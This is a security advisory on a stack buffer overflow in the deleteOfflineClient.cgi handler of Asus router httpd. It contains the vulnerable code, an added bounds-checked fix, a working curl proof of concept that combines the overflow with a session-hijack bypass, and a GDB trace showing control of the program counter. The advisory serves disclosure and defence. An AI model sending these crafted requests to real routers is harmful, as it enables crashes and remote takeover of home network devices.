## [Vulnerability]: ##
Stack buffer overflow in httpd
------------------------------------------
## [Exploitation]: ##
Can control $pc.
Used together with a session hijack vulnerability or in a CSRF attack,
this allows remote code execution and a connect-back shell.
------------------------------------------
## [Vendor of Product]: ##
Asus wireless router
------------------------------------------
## [Affected Products and firmware version]: ##
Asuswrt-Merlin, all firmware versions; the latest firmware is 380.67_0
RT-AC5300, all firmware versions, including the latest and earlier.
RT_AC1900P, all firmware versions, including the latest and earlier.
RT-AC68U, all firmware versions, including the latest and earlier.
RT-AC68P, all firmware versions, including the latest and earlier.
RT-AC88U, all firmware versions, including the latest and earlier.
RT-AC66U, all firmware versions, including the latest and earlier.
RT-AC66U_B1, all firmware versions, including the latest and earlier.
RT-AC58U, all firmware versions, including the latest and earlier.
RT-AC56U, all firmware versions, including the latest and earlier.
RT-AC55U, all firmware versions, including the latest and earlier.
RT-AC52U, all firmware versions, including the latest and earlier.
RT-AC51U, all firmware versions, including the latest and earlier.
RT-N18U, all firmware versions, including the latest and earlier.
RT-N66U, all firmware versions, including the latest and earlier.
RT-N56U, all firmware versions, including the latest and earlier.
RT-AC3200, all firmware versions, including the latest and earlier.
RT-AC3100, all firmware versions, including the latest and earlier.
RT_AC1200GU, all firmware versions, including the latest and earlier.
RT_AC1200G, all firmware versions, including the latest and earlier.
RT-AC1200, all firmware versions, including the latest and earlier.
RT-AC53, all firmware versions, including the latest and earlier.
RT-N12HP, all firmware versions, including the latest and earlier.
RT-N12HP_B1, all firmware versions, including the latest and earlier.
RT-N12D1, all firmware versions, including the latest and earlier.
RT-N12+, all firmware versions, including the latest and earlier.
RT_N12+_PRO, all firmware versions, including the latest and earlier.
RT-N16, all firmware versions, including the latest and earlier.
RT-N300, all firmware versions, including the latest and earlier.
------------------------------------------
## [Attack Type]: ##
Remote
------------------------------------------
## [Can Cause Denial of Service?]: ##
yes
------------------------------------------
## [Reference]: ##
https://github.com/RMerl/asuswrt-merlin/blob/master/release/src/router/httpd/web.c#L9277,L9289
http://asuswrt.lostrealm.ca/
https://www.asus.com/Networking/RTN12HP_B1/HelpDesk_Download/ (choose the other models to download their firmware source code)
https://www.asus.com/Networking/Wireless-Routers-Products/
------------------------------------------
## [Discoverer]: ##
Tianfeng Guan, pkav of Sichuan Silent Information Technology Company Ltd, http://www.silence.com.cn/
------------------------------------------
## [Affected components]: ##
Affected executable application: httpd
Affected source code file: \release\src\router\httpd\web.c
Affected function: `deleteOfflineClient(webs_t wp, char_t *urlPrefix, char_t *webDir, int arg, char_t *url, char_t *path, char_t *query)`
------------------------------------------
## [Vulnerability details]: ##
When deleteOfflineClient.cgi of the web manager (httpd) is accessed, httpd calls the function deleteOfflineClient()
to parse the URL of the HTTP GET request, and it uses websGetVar() to read the value of the parameter delete_offline_client
from the URL. However, when it copies delete_offline_client into the stack buffer char mac_str[13], it does not limit the length of the parameter
delete_offline_client, so the stack buffer mac_str[13] is overflowed. This stack-based overflow can be used to gain control over
httpd's control flow by overwriting the saved $ra stored on the stack.
```c
deleteOfflineClient(webs_t wp, char_t *urlPrefix, char_t *webDir, int arg, char_t *url, char_t *path, char_t *query)
{
    char *mac = NULL;
    char mac_str[13];                                    /* fixed-size stack buffer: 12 hex digits + NUL */
    mac = websGetVar(wp, "delete_offline_client", "");   /* request parameter, length not limited */
    ......
    ......
    i = 0;
    /* Every non-colon byte of the parameter is stored into mac_str without any
       bound check; the length test after the loop runs only once the buffer
       (and whatever follows it on the stack) has already been written. */
    while (*mac) {
        if (*mac == ':') {
            mac++;
            continue;
        }
        else {
            mac_str[i] = tolower(*mac);
            i++;
            mac++;
        }
    }
    if (i != 12)
        return;
    ......
}
```
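The following is an added example, not code from the advisory or from the Asuswrt project: a bounds-checked replacement for the MAC-parsing loop quoted above, beside a function that only counts how many bytes the unbounded loop would store. It also covers the exploitation detail below, since the count shows why an over-long parameter reaches the saved registers. The function and macro names (`parse_mac_safe`, `unbounded_copy_len`, `MAC_BUF_LEN`) are my own; `MAC_BUF_LEN` mirrors the advisory's `char mac_str[13]`, and the inputs in `main()` are constructed for illustration.

```c
/* Added example (not code from the advisory or from the Asuswrt project).
 * Names here are assumptions; MAC_BUF_LEN matches the advisory's mac_str[13]. */
#include <ctype.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

#define MAC_HEX_DIGITS 12                    /* a MAC address is 12 hex digits */
#define MAC_BUF_LEN    (MAC_HEX_DIGITS + 1)  /* same size as the advisory's mac_str[13] */

/* Count how many bytes the original loop would write into mac_str for this
 * input: every byte that is not ':' is stored, with no check against the
 * buffer size. This function only counts; it never performs the write. */
size_t unbounded_copy_len(const char *mac)
{
    size_t n = 0;
    for (; *mac != '\0'; mac++)
        if (*mac != ':')
            n++;
    return n;
}

/* Hardened parser: strips ':' separators, lower-cases the hex digits, and
 * writes at most out_len - 1 bytes plus a NUL. Returns 1 for a well-formed
 * 12-digit MAC, 0 for anything else (too long, too short, non-hex). The
 * length is checked before each store, so over-long input is rejected
 * instead of overrunning the buffer. */
int parse_mac_safe(const char *mac, char *out, size_t out_len)
{
    size_t i = 0;

    if (mac == NULL || out == NULL || out_len < MAC_BUF_LEN)
        return 0;
    out[0] = '\0';

    for (; *mac != '\0'; mac++) {
        if (*mac == ':')
            continue;
        if (i >= MAC_HEX_DIGITS)             /* would overflow: stop before writing */
            return 0;
        if (!isxdigit((unsigned char)*mac))  /* reject anything that is not hex */
            return 0;
        out[i++] = (char)tolower((unsigned char)*mac);
    }
    if (i != MAC_HEX_DIGITS)                 /* too short */
        return 0;
    out[i] = '\0';
    return 1;
}

/* Convenience wrapper for callers that only need a yes/no answer. */
int mac_is_valid(const char *mac)
{
    char buf[MAC_BUF_LEN];
    return parse_mac_safe(mac, buf, sizeof buf);
}

/* Returns the normalised MAC in a static buffer, or NULL if rejected
 * (static storage keeps the demo simple; not reentrant). */
const char *normalize_mac(const char *mac)
{
    static char buf[MAC_BUF_LEN];
    return parse_mac_safe(mac, buf, sizeof buf) ? buf : NULL;
}

/* Constructed inputs: a well-formed MAC and the over-long parameter value
 * from the advisory's example request. */
int main(void)
{
    const char *good = "AA:bb:CC:dd:EE:ff";
    const char *overlong = "aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:33:3";

    printf("%s -> %s\n", good, normalize_mac(good));
    printf("unbounded loop would write %zu bytes into a %d-byte buffer\n",
           unbounded_copy_len(overlong), MAC_BUF_LEN);
    printf("hardened parser accepts over-long value: %d\n", mac_is_valid(overlong));
    return 0;
}
```

The design point is that the length check moves in front of the store: the original code validates `i != 12` only after the loop has finished writing, by which time an over-long value has already passed the end of `mac_str`. Checking `i >= MAC_HEX_DIGITS` before each write, and rejecting non-hex bytes, means the function can never write outside the caller's buffer regardless of the parameter length.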
------------------------------------------
## [Exploitation details]: ##
Because access to the deleteOfflineClient.cgi page requires web authentication, a session hijack vulnerability or a
CSRF attack is needed first to obtain access to deleteOfflineClient.cgi. After that, this vulnerability can be used to control
httpd's control flow ($pc) by overwriting the saved $ra stored on the stack.
For example, an HTTP GET request like:
`GET /deleteOfflineClient.cgi?delete_offline_client=aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:33:3 HTTP/1.1`
sets httpd's control flow $pc to 0x00333333.
------------------------------------------
## [POC]: ##
```sh
# Tested product and firmware version: RT-N12HP_B1 (3.0.0.4.380.3479)
# With the help of CVE-2017-6549 (session hijack), this POC can exploit this vulnerability to control the $pc
curl -H 'User-Agent: asusrouter-Windows-IFTTT-1.0' -H 'Cookie: asus_token=cgi_logout' 'http://192.168.2.1/deleteOfflineClient.cgi?delete_offline_client=aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:aa:33:3'
```
------------------------------------------
## [Gdb trace]: ##
```text
admin@RT-N12HP_B1:/tmp/bin# ./gdb httpd $(pidof httpd)
dlopen failed on 'libthread_db.so.1' - File not found
GDB will not be able to debug pthreads.
GNU gdb 6.8
Copyright (C) 2008 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "mipsel-linux"...
I'm sorry, Dave, I can't do that. Symbol format `elf32-tradlittlemips' unknown.
Attaching to program: /usr/sbin/httpd, process 651
0x2ad8d05c in ?? () from /lib/libc.so.0
(gdb) c
Continuing.
Program received signal SIGSEGV, Segmentation fault.
0x00333333 in ?? ()
(gdb) i r
          zero       at       v0       v1       a0       a1       a2       a3
 R0   00000000 00000001 0000000c 00000000 004570ae 2adb90d0 0000001f 7fd973ff
            t0       t1       t2       t3       t4       t5       t6       t7
 R8   2adb90d0 7fd973e0 00000000 7fd970f0 2adb9f38 2adcc124 6172500a 3a616d67
            s0       s1       s2       s3       s4       s5       s6       s7
 R16  61616161 61616161 61616161 00000004 00446f4c 00000000 00446428 00498158
            t8       t9       k0       k1       gp       sp       s8       ra
 R24  00000000 2ad9f7d0 2adcfa70 00000000 0044e8d0 7fd97400 00440000 00333333
        status       lo       hi badvaddr    cause       pc
      01009c13 11288d57 00000001 00333332 00000008 00333333
          fcsr      fir  restart
      00800000 00000000 00000000
(gdb) c
Continuing.
Program terminated with signal SIGSEGV, Segmentation fault.
The program no longer exists.
```
As the trace shows, the registers ra and pc have been overwritten with 0x00333333 (the saved s0-s2 hold the 'a' bytes, 0x61616161, that preceded it).
Finally, combining this with ROP can lead to remote command execution.